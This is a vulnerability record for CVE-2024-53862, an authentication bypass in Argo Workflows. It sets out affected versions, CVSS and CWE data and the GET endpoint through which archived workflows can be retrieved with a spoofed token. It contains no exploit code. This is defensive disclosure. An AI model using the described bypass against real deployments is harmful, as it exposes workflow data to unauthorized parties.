CVE-2024-53862 (GCVE-0-2024-53862)
Vulnerability from cvelistv5 – Published: 2024-12-02 16:08 – Updated: 2024-12-02 19:41

| URL | Tags |
|---|---|
| https://github.com/argoproj/argo-workflows/securi… | x_refsource_CONFIRM |
| https://github.com/argoproj/argo-workflows/pull/1… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| argoproj | argo-workflows | Affected: >= 3.5.7, < 3.5.13 | |
| argoproj | argo-workflows | Affected: >= 3.6.0-rc1, < 3.6.2 | |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:argoproj:argo-workflows:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "argo-workflows",
"vendor": "argoproj",
"versions": [
{
"lessThanOrEqual": "3.5.7",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "3.5.13",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "3.6.0-rc1",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "3.6.2",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-53862",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-12-02T19:34:48.219260Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-12-02T19:41:07.391Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "argo-workflows",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.5.7, \u003c 3.5.13"
},
{
"status": "affected",
"version": "\u003e= 3.6.0-rc1, \u003c 3.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290: Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-12-02T16:08:17.618Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
},
{
"name": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
}
],
"source": {
"advisory": "GHSA-h36c-m3rf-34h9",
"discovery": "UNKNOWN"
},
"title": "Argo Workflows Allows Access to Archived Workflows with Fake Token in `client` mode"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-53862",
"datePublished": "2024-12-02T16:08:17.618Z",
"dateReserved": "2024-11-22T17:30:02.144Z",
"dateUpdated": "2024-12-02T19:41:07.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-53862",
"date": "2026-05-21",
"epss": "0.00321",
"percentile": "0.55249"
},
"fkie_nvd": {
"descriptions": "[{\"lang\": \"en\", \"value\": \"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.\"}, {\"lang\": \"es\", \"value\": \"Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\\u00e1lido a trav\\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\\u00f3n en los tokens `client`. 
En cambio, la autenticaci\\u00f3n y la autorizaci\\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\\u00faa con k8s, por lo que cualquier token que parezca v\\u00e1lido se considerar\\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\\u00e9s, el Archivo de flujo de trabajo realiza espec\\u00edficamente el equivalente de una verificaci\\u00f3n `kubectl auth can-i` para los m\\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\\u00f3n de autenticaci\\u00f3n se elimin\\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\\u00edneas, lo que permiti\\u00f3 recuperar flujos de trabajo archivados con un token falso. Esta vulnerabilidad se corrigi\\u00f3 en 3.6.2 y 3.5.13.\"}]",
"id": "CVE-2024-53862",
"lastModified": "2024-12-02T16:15:14.277",
"metrics": "{\"cvssMetricV40\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"4.0\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\", \"baseScore\": 6.3, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"vulnerableSystemConfidentiality\": \"LOW\", \"vulnerableSystemIntegrity\": \"NONE\", \"vulnerableSystemAvailability\": \"NONE\", \"subsequentSystemConfidentiality\": \"LOW\", \"subsequentSystemIntegrity\": \"NONE\", \"subsequentSystemAvailability\": \"NONE\", \"exploitMaturity\": \"NOT_DEFINED\", \"confidentialityRequirements\": \"NOT_DEFINED\", \"integrityRequirements\": \"NOT_DEFINED\", \"availabilityRequirements\": \"NOT_DEFINED\", \"modifiedAttackVector\": \"NOT_DEFINED\", \"modifiedAttackComplexity\": \"NOT_DEFINED\", \"modifiedAttackRequirements\": \"NOT_DEFINED\", \"modifiedPrivilegesRequired\": \"NOT_DEFINED\", \"modifiedUserInteraction\": \"NOT_DEFINED\", \"modifiedVulnerableSystemConfidentiality\": \"NOT_DEFINED\", \"modifiedVulnerableSystemIntegrity\": \"NOT_DEFINED\", \"modifiedVulnerableSystemAvailability\": \"NOT_DEFINED\", \"modifiedSubsequentSystemConfidentiality\": \"NOT_DEFINED\", \"modifiedSubsequentSystemIntegrity\": \"NOT_DEFINED\", \"modifiedSubsequentSystemAvailability\": \"NOT_DEFINED\", \"safety\": \"NOT_DEFINED\", \"automatable\": \"NOT_DEFINED\", \"recovery\": \"NOT_DEFINED\", \"valueDensity\": \"NOT_DEFINED\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\"}}]}",
"published": "2024-12-02T16:15:14.277",
"references": "[{\"url\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"source\": \"security-advisories@github.com\"}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-200\"}, {\"lang\": \"en\", \"value\": \"CWE-290\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-53862\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-12-02T16:15:14.277\",\"lastModified\":\"2026-02-06T20:49:29.827\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.\"},{\"lang\":\"es\",\"value\":\"Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. 
Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\u00e1lido a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\u00f3n en los tokens `client`. En cambio, la autenticaci\u00f3n y la autorizaci\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\u00faa con k8s, por lo que cualquier token que parezca v\u00e1lido se considerar\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\u00e9s, el Archivo de flujo de trabajo realiza espec\u00edficamente el equivalente de una verificaci\u00f3n `kubectl auth can-i` para los m\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\u00f3n de autenticaci\u00f3n se elimin\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\u00edneas, lo que permiti\u00f3 recuperar flujos de trabajo archivados con un token falso. 
Esta vulnerabilidad se corrigi\u00f3 en 3.6.2 y 3.5.13.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":
\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-290\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-290\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"3.5.7\",\"versionEndExcluding\":\"3.5.13\",\"matchCriteriaId\":\"9231D0D8-9FB4-41F3-B41F-F98D22C3C348\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"3.6.0\",\"versionEndExcluding\":\"3.6.2\",\"matchCriteriaId\":\"00514674-61E7-4FF9-874E-C5A2A87A692C\"}]}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-53862\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-12-02T19:34:48.219260Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:argoproj:argo-workflows:*:*:*:*:*:*:*:*\"], \"vendor\": \"argoproj\", \"product\": \"argo-workflows\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"3.5.7\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"3.5.13\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"3.6.0-rc1\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"3.6.2\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-12-02T19:40:13.006Z\"}}], \"cna\": {\"title\": \"Argo Workflows Allows Access to Archived Workflows with Fake Token in `client` mode\", \"source\": {\"advisory\": \"GHSA-h36c-m3rf-34h9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-workflows\", 
\"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.5.7, \u003c 3.5.13\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.6.0-rc1, \u003c 3.6.2\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"name\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"name\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. 
This vulnerability is fixed in 3.6.2 and 3.5.13.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-290\", \"description\": \"CWE-290: Authentication Bypass by Spoofing\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-12-02T16:08:17.618Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-53862\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-12-02T19:41:07.391Z\", \"dateReserved\": \"2024-11-22T17:30:02.144Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-12-02T16:08:17.618Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2024-53862
Vulnerability from fkie_nvd - Published: 2024-12-02 16:15 - Updated: 2026-02-06 20:49

| Vendor | Product | Version | |
|---|---|---|---|
| argoproj | argo_workflows | * | |
| argoproj | argo_workflows | * | |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*",
"matchCriteriaId": "9231D0D8-9FB4-41F3-B41F-F98D22C3C348",
"versionEndExcluding": "3.5.13",
"versionStartIncluding": "3.5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*",
"matchCriteriaId": "00514674-61E7-4FF9-874E-C5A2A87A692C",
"versionEndExcluding": "3.6.2",
"versionStartIncluding": "3.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13."
},
{
"lang": "es",
"value": "Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\u00e1lido a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\u00f3n en los tokens `client`. En cambio, la autenticaci\u00f3n y la autorizaci\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\u00faa con k8s, por lo que cualquier token que parezca v\u00e1lido se considerar\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\u00e9s, el Archivo de flujo de trabajo realiza espec\u00edficamente el equivalente de una verificaci\u00f3n `kubectl auth can-i` para los m\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\u00f3n de autenticaci\u00f3n se elimin\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\u00edneas, lo que permiti\u00f3 recuperar flujos de trabajo archivados con un token falso. Esta vulnerabilidad se corrigi\u00f3 en 3.6.2 y 3.5.13."
}
],
"id": "CVE-2024-53862",
"lastModified": "2026-02-06T20:49:29.827",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-12-02T16:15:14.277",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
},
{
"lang": "en",
"value": "CWE-290"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-290"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-H36C-M3RF-34H9
Vulnerability from github – Published: 2024-12-02 22:17 – Updated: 2024-12-02 22:17

Summary
